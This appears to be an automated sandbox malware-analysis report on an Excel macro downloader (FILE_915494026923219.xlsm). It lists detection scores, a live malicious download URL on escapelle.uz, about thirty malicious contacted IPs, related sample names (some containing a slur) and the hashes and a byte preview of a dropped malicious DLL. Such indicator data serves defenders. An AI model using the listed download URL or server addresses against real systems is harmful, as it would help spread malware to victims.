                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    FILE_915494026923219.xlsm22%ReversingLabsDocument-Office.Downloader.EncDoc

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    SourceDetectionScannerLabelLinkDownload
                    3.2.rundll32.exe.2f0000.0.unpack100%AviraHEUR/AGEN.1110387Download File

                    Domains

                    SourceDetectionScannerLabelLink
                    escapelle.uz5%VirustotalBrowse
                    www.escapelle.uz6%VirustotalBrowse

                    URLs

                    SourceDetectionScannerLabelLink
                    https://www.escapelle.uz/wp-includes/n1vS/a0%Avira URL Cloudsafe
                    http://schemas.openformatrg/drawml/2006/spreadsheetD0%Avira URL Cloudsafe
                    http://ocsp.entrust.net030%URL Reputationsafe
                    http://schemas.openformatrg/package/2006/content-t0%URL Reputationsafe
                    https://www.escapelle.u0%Avira URL Cloudsafe
                    http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                    http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                    https://www.escapelle.uz/wp-includ$https://www.escapelle.uz/wp-includes0%Avira URL Cloudsafe
                    http://schemas.open0%URL Reputationsafe
                    https://www.escapelle.uz/wp-in0%Avira URL Cloudsafe
                    https://www.escapelle.uz/wp-includes/n10%Avira URL Cloudsafe
                    https://www.escapelle.uz/wp-includes/n1vS/D0%Avira URL Cloudsafe
                    https://www.escapelle.uz/w0%Avira URL Cloudsafe
                    http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                    http://www.icra.org/vocabulary/.0%URL Reputationsafe
                    http://schemas.openformatrg/package/2006/r0%URL Reputationsafe
                    https://www.escapelle.uz/10%Avira URL Cloudsafe
                    https://www.escapelle.uz/wp-incl0%Avira URL Cloudsafe
                    https://www.escapelle.uz/)0%Avira URL Cloudsafe
                    https://www.escapelle.uz/wp-includes/n1vS/0%Avira URL Cloudsafe
                    http://ocsp.entrust.net0D0%URL Reputationsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    escapelle.uz
                    62.209.128.105
                    truetrueunknown
                    www.escapelle.uz
                    unknown
                    unknowntrueunknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://www.escapelle.uz/wp-includes/n1vS/true
                    • Avira URL Cloud: safe
                    unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://www.windows.com/pctv.rundll32.exe, 00000006.00000002.740536430.0000000001E60000.00000002.00020000.sdmpfalse
                      high
                      http://investor.msn.comEXCEL.EXE, 00000000.00000002.745031381.0000000005060000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.588445230.0000000001E60000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.740536430.0000000001E60000.00000002.00020000.sdmpfalse
                        high
                        http://www.msnbc.com/news/ticker.txtEXCEL.EXE, 00000000.00000002.745031381.0000000005060000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.588445230.0000000001E60000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.740536430.0000000001E60000.00000002.00020000.sdmpfalse
                          high
                          https://www.escapelle.uz/wp-includes/n1vS/aEXCEL.EXE, 00000000.00000002.744930207.0000000004F56000.00000004.00000001.sdmptrue
                          • Avira URL Cloud: safe
                          unknown
                          http://crl.entrust.net/server1.crl0EXCEL.EXE, 00000000.00000002.746951484.00000000059CD000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.527070662.00000000059F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.527198087.00000000059D7000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.746994076.00000000059F2000.00000004.00000001.sdmpfalse
                            high
                            http://schemas.openformatrg/drawml/2006/spreadsheetDEXCEL.EXE, 00000000.00000002.748830176.0000000007226000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://ocsp.entrust.net03EXCEL.EXE, 00000000.00000002.746951484.00000000059CD000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.527070662.00000000059F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.527198087.00000000059D7000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.746994076.00000000059F2000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://schemas.openformatrg/package/2006/content-tEXCEL.EXE, 00000000.00000002.748794538.0000000007076000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://www.escapelle.uEXCEL.EXE, 00000000.00000002.748109035.0000000006B30000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0EXCEL.EXE, 00000000.00000003.527070662.00000000059F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.746994076.00000000059F2000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.diginotar.nl/cps/pkioverheid0EXCEL.EXE, 00000000.00000003.527070662.00000000059F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.746994076.00000000059F2000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://windowsmedia.com/redir/services.asp?WMPFriendly=trueEXCEL.EXE, 00000000.00000002.745207198.0000000005247000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.588579301.0000000002047000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.740860352.0000000002047000.00000002.00020000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.hotmail.com/oeEXCEL.EXE, 00000000.00000002.745031381.0000000005060000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.588445230.0000000001E60000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.740536430.0000000001E60000.00000002.00020000.sdmpfalse
                              high
                              https://www.escapelle.uz/wp-includ$https://www.escapelle.uz/wp-includesEXCEL.EXE, 00000000.00000002.748109035.0000000006B30000.00000004.00000001.sdmptrue
                              • Avira URL Cloud: safe
                              unknown
                              http://schemas.openEXCEL.EXE, 00000000.00000002.748794538.0000000007076000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.748830176.0000000007226000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.748879315.0000000007316000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.748858460.0000000007266000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://www.escapelle.uz/wp-inEXCEL.EXE, 00000000.00000002.748109035.0000000006B30000.00000004.00000001.sdmptrue
                              • Avira URL Cloud: safe
                              unknown
                              https://www.escapelle.uz/wp-includes/n1EXCEL.EXE, 00000000.00000002.748109035.0000000006B30000.00000004.00000001.sdmptrue
                              • Avira URL Cloud: safe
                              unknown
                              http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&CheckEXCEL.EXE, 00000000.00000002.745207198.0000000005247000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.588579301.0000000002047000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.740860352.0000000002047000.00000002.00020000.sdmpfalse
                                high
                                https://www.escapelle.uz/wp-includes/n1vS/DEXCEL.EXE, 00000000.00000002.744930207.0000000004F56000.00000004.00000001.sdmptrue
                                • Avira URL Cloud: safe
                                unknown
                                https://www.escapelle.uz/wEXCEL.EXE, 00000000.00000002.748109035.0000000006B30000.00000004.00000001.sdmptrue
                                • Avira URL Cloud: safe
                                unknown
                                http://crl.pkioverheid.nl/DomOvLatestCRL.crl0EXCEL.EXE, 00000000.00000003.527070662.00000000059F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.746994076.00000000059F2000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.icra.org/vocabulary/.EXCEL.EXE, 00000000.00000002.745207198.0000000005247000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.588579301.0000000002047000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.740860352.0000000002047000.00000002.00020000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://schemas.openformatrg/package/2006/rEXCEL.EXE, 00000000.00000002.748879315.0000000007316000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.748858460.0000000007266000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://www.escapelle.uz/1EXCEL.EXE, 00000000.00000002.746925862.00000000059AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.527173545.00000000059AF000.00000004.00000001.sdmptrue
                                • Avira URL Cloud: safe
                                unknown
                                http://investor.msn.com/EXCEL.EXE, 00000000.00000002.745031381.0000000005060000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.588445230.0000000001E60000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.740536430.0000000001E60000.00000002.00020000.sdmpfalse
                                  high
                                  https://www.escapelle.uz/wp-inclEXCEL.EXE, 00000000.00000002.748109035.0000000006B30000.00000004.00000001.sdmptrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://www.escapelle.uz/)EXCEL.EXE, 00000000.00000002.746925862.00000000059AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.527173545.00000000059AF000.00000004.00000001.sdmptrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://ocsp.entrust.net0DEXCEL.EXE, 00000000.00000003.527070662.00000000059F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.746994076.00000000059F2000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://secure.comodo.com/CPS0EXCEL.EXE, 00000000.00000002.746925862.00000000059AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.527173545.00000000059AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.746951484.00000000059CD000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.527070662.00000000059F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.527198087.00000000059D7000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.746994076.00000000059F2000.00000004.00000001.sdmpfalse
                                    high
                                    http://crl.entrust.net/2048ca.crl0EXCEL.EXE, 00000000.00000003.527070662.00000000059F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.746994076.00000000059F2000.00000004.00000001.sdmpfalse
                                      high

                                      Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public

                                      IPDomainCountryFlagASNASN NameMalicious
                                      195.154.133.20
                                      unknownFrance
                                      12876OnlineSASFRtrue
                                      212.237.17.99
                                      unknownItaly
                                      31034ARUBA-ASNITtrue
                                      110.232.117.186
                                      unknownAustralia
                                      56038RACKCORP-APRackCorpAUtrue
                                      104.245.52.73
                                      unknownUnited States
                                      63251METRO-WIRELESSUStrue
                                      138.185.72.26
                                      unknownBrazil
                                      264343EmpasoftLtdaMeBRtrue
                                      81.0.236.90
                                      unknownCzech Republic
                                      15685CASABLANCA-ASInternetCollocationProviderCZtrue
                                      45.118.115.99
                                      unknownIndonesia
                                      131717IDNIC-CIFO-AS-IDPTCitraJelajahInformatikaIDtrue
                                      103.75.201.2
                                      unknownThailand
                                      133496CDNPLUSCOLTD-AS-APCDNPLUSCOLTDTHtrue
                                      216.158.226.206
                                      unknownUnited States
                                      19318IS-AS-1UStrue
                                      107.182.225.142
                                      unknownUnited States
                                      32780HOSTINGSERVICES-INCUStrue
                                      45.118.135.203
                                      unknownJapan63949LINODE-APLinodeLLCUStrue
                                      50.116.54.215
                                      unknownUnited States
                                      63949LINODE-APLinodeLLCUStrue
                                      51.68.175.8
                                      unknownFrance
                                      16276OVHFRtrue
                                      62.209.128.105
                                      escapelle.uzUzbekistan
                                      34718TPSUZ-ASUZtrue
                                      103.8.26.102
                                      unknownMalaysia
                                      132241SKSATECH1-MYSKSATECHNOLOGYSDNBHDMYtrue
                                      46.55.222.11
                                      unknownBulgaria
                                      34841BALCHIKNETBGtrue
                                      41.76.108.46
                                      unknownSouth Africa
                                      327979DIAMATRIXZAtrue
                                      103.8.26.103
                                      unknownMalaysia
                                      132241SKSATECH1-MYSKSATECHNOLOGYSDNBHDMYtrue
                                      178.79.147.66
                                      unknownUnited Kingdom
                                      63949LINODE-APLinodeLLCUStrue
                                      212.237.5.209
                                      unknownItaly
                                      31034ARUBA-ASNITtrue
                                      176.104.106.96
                                      unknownSerbia
                                      198371NINETRStrue
                                      207.38.84.195
                                      unknownUnited States
                                      30083AS-30083-GO-DADDY-COM-LLCUStrue
                                      212.237.56.116
                                      unknownItaly
                                      31034ARUBA-ASNITtrue
                                      45.142.114.231
                                      unknownGermany
                                      44066DE-FIRSTCOLOwwwfirst-colonetDEtrue
                                      203.114.109.124
                                      unknownThailand
                                      131293TOT-LLI-AS-APTOTPublicCompanyLimitedTHtrue
                                      210.57.217.132
                                      unknownIndonesia
                                      38142UNAIR-AS-IDUniversitasAirlanggaIDtrue
                                      58.227.42.236
                                      unknownKorea Republic of
                                      9318SKB-ASSKBroadbandCoLtdKRtrue
                                      185.184.25.237
                                      unknownTurkey
                                      209711MUVHOSTTRtrue
                                      158.69.222.101
                                      unknownCanada
                                      16276OVHFRtrue
                                      104.251.214.46
                                      unknownUnited States
                                      54540INCERO-HVVCUStrue

                                      General Information

                                      Joe Sandbox Version:34.0.0 Boulder Opal
                                      Analysis ID:532440
                                      Start date:02.12.2021
                                      Start time:09:39:14
                                      Joe Sandbox Product:CloudBasic
                                      Overall analysis duration:0h 7m 25s
                                      Hypervisor based Inspection enabled:false
                                      Report type:light
                                      Sample file name:FILE_915494026923219.xlsm
                                      Cookbook file name:defaultwindowsofficecookbook.jbs
                                      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                      Number of analysed new started processes analysed:7
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • HDC enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Detection:MAL
                                      Classification:mal100.troj.expl.evad.winXLSM@5/6@1/30
                                      EGA Information:Failed
                                      HDC Information:
                                      • Successful, ratio: 6.5% (good quality ratio 6.2%)
                                      • Quality average: 71.5%
                                      • Quality standard deviation: 25.4%
                                      HCA Information:
                                      • Successful, ratio: 53%
                                      • Number of executed functions: 0
                                      • Number of non-executed functions: 0
                                      Cookbook Comments:
                                      • Adjust boot time
                                      • Enable AMSI
                                      • Found application associated with file extension: .xlsm
                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                      • Attach to Office via COM
                                      • Scroll down
                                      • Close Viewer
                                      Warnings:
                                      Show All
                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, svchost.exe
                                      • TCP Packets have been reduced to 100

                                      Simulations

                                      Behavior and APIs

                                      No simulations

                                      Joe Sandbox View / Context

                                      IPs

                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      195.154.133.20UioA2E9DBG.dllGet hashmaliciousBrowse
                                        UioA2E9DBG.dllGet hashmaliciousBrowse
                                          916Q89rlYD.dllGet hashmaliciousBrowse
                                            9izNuvE61W.dllGet hashmaliciousBrowse
                                              P5LROPCURK.dllGet hashmaliciousBrowse
                                                TYLNb8VvnmYA.dllGet hashmaliciousBrowse
                                                  TYLNb8VvnmYA.dllGet hashmaliciousBrowse
                                                    snBYiBAMB2.dllGet hashmaliciousBrowse
                                                      6zAcNlJXo7.dllGet hashmaliciousBrowse
                                                        6zAcNlJXo7.dllGet hashmaliciousBrowse
                                                          mal.dllGet hashmaliciousBrowse
                                                            mal2.dllGet hashmaliciousBrowse
                                                              mal.dllGet hashmaliciousBrowse
                                                                mal2.dllGet hashmaliciousBrowse
                                                                  2gyA5uNl6VPQUA.dllGet hashmaliciousBrowse
                                                                    2gyA5uNl6VPQUA.dllGet hashmaliciousBrowse
                                                                      9sQccNfqAR.dllGet hashmaliciousBrowse
                                                                        FILE_464863409880121918.xlsmGet hashmaliciousBrowse
                                                                          9sQccNfqAR.dllGet hashmaliciousBrowse
                                                                            t3XtgyQEoe.dllGet hashmaliciousBrowse
                                                                              212.237.17.99UioA2E9DBG.dllGet hashmaliciousBrowse
                                                                                UioA2E9DBG.dllGet hashmaliciousBrowse
                                                                                  916Q89rlYD.dllGet hashmaliciousBrowse
                                                                                    9izNuvE61W.dllGet hashmaliciousBrowse
                                                                                      P5LROPCURK.dllGet hashmaliciousBrowse
                                                                                        TYLNb8VvnmYA.dllGet hashmaliciousBrowse
                                                                                          TYLNb8VvnmYA.dllGet hashmaliciousBrowse
                                                                                            snBYiBAMB2.dllGet hashmaliciousBrowse
                                                                                              6zAcNlJXo7.dllGet hashmaliciousBrowse
                                                                                                6zAcNlJXo7.dllGet hashmaliciousBrowse
                                                                                                  mal.dllGet hashmaliciousBrowse
                                                                                                    mal2.dllGet hashmaliciousBrowse
                                                                                                      mal.dllGet hashmaliciousBrowse
                                                                                                        mal2.dllGet hashmaliciousBrowse
                                                                                                          2gyA5uNl6VPQUA.dllGet hashmaliciousBrowse
                                                                                                            2gyA5uNl6VPQUA.dllGet hashmaliciousBrowse
                                                                                                              9sQccNfqAR.dllGet hashmaliciousBrowse
                                                                                                                FILE_464863409880121918.xlsmGet hashmaliciousBrowse
                                                                                                                  9sQccNfqAR.dllGet hashmaliciousBrowse
                                                                                                                    t3XtgyQEoe.dllGet hashmaliciousBrowse

                                                                                                                      Domains

                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext

                                                                                                                      ASN

                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                      ARUBA-ASNITUioA2E9DBG.dllGet hashmaliciousBrowse
                                                                                                                      • 212.237.56.116
                                                                                                                      UioA2E9DBG.dllGet hashmaliciousBrowse
                                                                                                                      • 212.237.56.116
                                                                                                                      916Q89rlYD.dllGet hashmaliciousBrowse
                                                                                                                      • 212.237.56.116
                                                                                                                      9izNuvE61W.dllGet hashmaliciousBrowse
                                                                                                                      • 212.237.56.116
                                                                                                                      P5LROPCURK.dllGet hashmaliciousBrowse
                                                                                                                      • 212.237.56.116
                                                                                                                      zTGtLv4pTO.dllGet hashmaliciousBrowse
                                                                                                                      • 94.177.217.88
                                                                                                                      zTGtLv4pTO.dllGet hashmaliciousBrowse
                                                                                                                      • 94.177.217.88
                                                                                                                      TYLNb8VvnmYA.dllGet hashmaliciousBrowse
                                                                                                                      • 212.237.56.116
                                                                                                                      TYLNb8VvnmYA.dllGet hashmaliciousBrowse
                                                                                                                      • 212.237.56.116
                                                                                                                      snBYiBAMB2.dllGet hashmaliciousBrowse
                                                                                                                      • 212.237.56.116
                                                                                                                      6zAcNlJXo7.dllGet hashmaliciousBrowse
                                                                                                                      • 212.237.56.116
                                                                                                                      6zAcNlJXo7.dllGet hashmaliciousBrowse
                                                                                                                      • 212.237.56.116
                                                                                                                      DHL DOCUMENT FOR #504.exeGet hashmaliciousBrowse
                                                                                                                      • 62.149.128.40
                                                                                                                      RqgAGRvHNwhoreniggagay.dllGet hashmaliciousBrowse
                                                                                                                      • 94.177.217.88
                                                                                                                      RqgAGRvHNwhoreniggagay.dllGet hashmaliciousBrowse
                                                                                                                      • 94.177.217.88
                                                                                                                      dFUOuTxFQrXAwhoreniggagay.dllGet hashmaliciousBrowse
                                                                                                                      • 94.177.217.88
                                                                                                                      RbrKCqqjDPUwhoreniggagay.dllGet hashmaliciousBrowse
                                                                                                                      • 94.177.217.88
                                                                                                                      dFUOuTxFQrXAwhoreniggagay.dllGet hashmaliciousBrowse
                                                                                                                      • 94.177.217.88
                                                                                                                      RbrKCqqjDPUwhoreniggagay.dllGet hashmaliciousBrowse
                                                                                                                      • 94.177.217.88
                                                                                                                      mal.dllGet hashmaliciousBrowse
                                                                                                                      • 212.237.56.116
                                                                                                                      OnlineSASFRUioA2E9DBG.dllGet hashmaliciousBrowse
                                                                                                                      • 195.154.133.20
                                                                                                                      UioA2E9DBG.dllGet hashmaliciousBrowse
                                                                                                                      • 195.154.133.20
                                                                                                                      916Q89rlYD.dllGet hashmaliciousBrowse
                                                                                                                      • 195.154.133.20
                                                                                                                      9izNuvE61W.dllGet hashmaliciousBrowse
                                                                                                                      • 195.154.133.20
                                                                                                                      P5LROPCURK.dllGet hashmaliciousBrowse
                                                                                                                      • 195.154.133.20
                                                                                                                      GlobalfoundriesINV33-45776648.htmGet hashmaliciousBrowse
                                                                                                                      • 51.15.17.195
                                                                                                                      TYLNb8VvnmYA.dllGet hashmaliciousBrowse
                                                                                                                      • 195.154.133.20
                                                                                                                      TYLNb8VvnmYA.dllGet hashmaliciousBrowse
                                                                                                                      • 195.154.133.20
                                                                                                                      snBYiBAMB2.dllGet hashmaliciousBrowse
                                                                                                                      • 195.154.133.20
                                                                                                                      6zAcNlJXo7.dllGet hashmaliciousBrowse
                                                                                                                      • 195.154.133.20
                                                                                                                      6zAcNlJXo7.dllGet hashmaliciousBrowse
                                                                                                                      • 195.154.133.20
                                                                                                                      mal.dllGet hashmaliciousBrowse
                                                                                                                      • 195.154.133.20
                                                                                                                      mal2.dllGet hashmaliciousBrowse
                                                                                                                      • 195.154.133.20
                                                                                                                      mal.dllGet hashmaliciousBrowse
                                                                                                                      • 195.154.133.20
                                                                                                                      mal2.dllGet hashmaliciousBrowse
                                                                                                                      • 195.154.133.20
                                                                                                                      2gyA5uNl6VPQUA.dllGet hashmaliciousBrowse
                                                                                                                      • 195.154.133.20
                                                                                                                      2gyA5uNl6VPQUA.dllGet hashmaliciousBrowse
                                                                                                                      • 195.154.133.20
                                                                                                                      spZRMihlrkFGqYq1f.dllGet hashmaliciousBrowse
                                                                                                                      • 195.154.146.35
                                                                                                                      spZRMihlrkFGqYq1f.dllGet hashmaliciousBrowse
                                                                                                                      • 195.154.146.35
                                                                                                                      AtlanticareINV25-67431254.htmGet hashmaliciousBrowse
                                                                                                                      • 51.15.17.195

                                                                                                                      JA3 Fingerprints

                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                      7dcce5b76c8b17472d024758970a406bIRQ2107797.ppamGet hashmaliciousBrowse
                                                                                                                      • 62.209.128.105
                                                                                                                      PaCJ39hC4R.xlsxGet hashmaliciousBrowse
                                                                                                                      • 62.209.128.105
                                                                                                                      part-1500645108.xlsbGet hashmaliciousBrowse
                                                                                                                      • 62.209.128.105
                                                                                                                      invoice template 33142738819.docxGet hashmaliciousBrowse
                                                                                                                      • 62.209.128.105
                                                                                                                      item-40567503.xlsbGet hashmaliciousBrowse
                                                                                                                      • 62.209.128.105
                                                                                                                      FILE_464863409880121918.xlsmGet hashmaliciousBrowse
                                                                                                                      • 62.209.128.105
                                                                                                                      item-107262298.xlsbGet hashmaliciousBrowse
                                                                                                                      • 62.209.128.105
                                                                                                                      item-1202816963.xlsbGet hashmaliciousBrowse
                                                                                                                      • 62.209.128.105
                                                                                                                      counter-119221000.xlsGet hashmaliciousBrowse
                                                                                                                      • 62.209.128.105
                                                                                                                      box-1688169224.xlsbGet hashmaliciousBrowse
                                                                                                                      • 62.209.128.105
                                                                                                                      box-1689035414.xlsbGet hashmaliciousBrowse
                                                                                                                      • 62.209.128.105
                                                                                                                      survey-1805824485.xlsGet hashmaliciousBrowse
                                                                                                                      • 62.209.128.105
                                                                                                                      box-1235955987.xlsbGet hashmaliciousBrowse
                                                                                                                      • 62.209.128.105
                                                                                                                      tr.xlsGet hashmaliciousBrowse
                                                                                                                      • 62.209.128.105
                                                                                                                      counter-1389180325.xlsGet hashmaliciousBrowse
                                                                                                                      • 62.209.128.105
                                                                                                                      Purchase Order.ppaGet hashmaliciousBrowse
                                                                                                                      • 62.209.128.105
                                                                                                                      TLFB795942-02.docxGet hashmaliciousBrowse
                                                                                                                      • 62.209.128.105
                                                                                                                      desc-1753454091.xlsGet hashmaliciousBrowse
                                                                                                                      • 62.209.128.105
                                                                                                                      PURCHASED ORDER CONFIRMATION UGANDA.xlsxGet hashmaliciousBrowse
                                                                                                                      • 62.209.128.105
                                                                                                                      desc-1196210401.xlsGet hashmaliciousBrowse
                                                                                                                      • 62.209.128.105

                                                                                                                      Dropped Files

                                                                                                                      No context

                                                                                                                      Created / dropped Files

                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\gb[1].dll
                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):473600
                                                                                                                      Entropy (8bit):7.196223462459893
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12288:mFyGBDytNZAR5Myju+qQuj/J+7L6Dg8stHb1h:mF92e/jEk7mDg8stJh
                                                                                                                      MD5:1F50BEBB323B3AE8E1EEC983C08BE7CC
                                                                                                                      SHA1:E64D4FE4128CA770514E9BC499B4473A41D9AC21
                                                                                                                      SHA-256:4DD6170895A3BFDF5568AAB65EDFDE43051BF245F059C669E902621F25EAB94C
                                                                                                                      SHA-512:687F7C268CB90EFE34429D1DFC83C7AB5EDDCE4EE14BE1E59ED02CFED8AA782346CA61EC4F93B6FE619A440E76C246E7E2C9B6C3992464A7EB83B58503319447
                                                                                                                      Malicious:true
                                                                                                                      Reputation:low
                                                                                                                      Preview: MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........A~.. ... ... ...F... ...F..D ...U... ...U... ...U... ...F... ...F... ...F... ... ..< ..TU... ..TU... ..TU.. ... ... ..TU... ..Rich. ..........................PE..L....a...........!.................L...............................................Y....@.............................D..............HD...................P..x-..................................8h..@...............(............................text.............................. ..`.rdata.. %.......&..................@..@.data....#..........................@....rsrc...HD.......F..................@..@.reloc..x-...P......................@..B........................................................................................................................................................................................................................................................................
                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3326FDF8.png
                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                      File Type:PNG image data, 1714 x 241, 8-bit colormap, non-interlaced
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):14200
                                                                                                                      Entropy (8bit):7.855440184003825
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:aeN0UV6iAmjeSvWFL3SdwHEpS4Q24kc49+Tb:jmUxjfC30+kS4Qyob
                                                                                                                      MD5:4FE798EE522800691796BC9446918C90
                                                                                                                      SHA1:1E01CDE49D0B1B5E2F0DFBAD568DC2ECFBEDEAD3
                                                                                                                      SHA-256:EC0BC049D3D30C29567806EB2D555589CD2E1B6B30E9145F77B73A32EC1C1087
                                                                                                                      SHA-512:FF968DA2D921DA198E93E82E2FB15583CFA4696455755A6674BC321CD90AE5502ADDC445A0F8C630D9DC780E77EEC6FFC83F55CD2C16DDE7F465BFD0D89BF1AA
                                                                                                                      Malicious:false
                                                                                                                      Reputation:low
                                                                                                                      Preview: .PNG........IHDR..............-......sRGB.........gAMA......a.....PLTE....6...6.....6..a..a..6......a.....a...aa....6....6...66666.6aa..a..6aaa...a....66.....aaaa..aaaa6a....a....66...6.a.....S.b.....6.:...b....f....S.....t:...6t...f..........:6...S:6.:bS......fbS..Sf.t.....:.t..t....bS..tfb..6.f...Sfb.......:.S.....6l...WtRNS........................................................................................c5.....pHYs..........o.d..5.IDATx^.....q....R.A...[.l...'@. .....G..'..;...%..]U]3s....x.s.;.]]..W...............................................................................................................................................~..|....../~...?.{...~fe./...).H....Og1.6g....1T+v..'"h.._(Z;.Zh.bo.....rip..5.>..).h..(F....Z.[.q2B.WZz,...M}@..n$.dO.VK?......YZ...."-o#.K..q..-#5.JT1.K.H..]se.M+.!...R..m{..Q#lO..^ev.R:...0.>.....\....=.>.Op.<..p....qN.Vfq,..\F..6.1..+.. .J....c.4?.Jx...u..X+.E.D...Ko.}...s..G..8I.v...8'B....y..).
                                                                                                                      C:\Users\user\AppData\Local\Temp\B960.tmp
                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1536
                                                                                                                      Entropy (8bit):1.1464700112623651
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
                                                                                                                      MD5:72F5C05B7EA8DD6059BF59F50B22DF33
                                                                                                                      SHA1:D5AF52E129E15E3A34772806F6C5FBF132E7408E
                                                                                                                      SHA-256:1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
                                                                                                                      SHA-512:6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E
                                                                                                                      Malicious:false
                                                                                                                      Reputation:moderate, very likely benign file
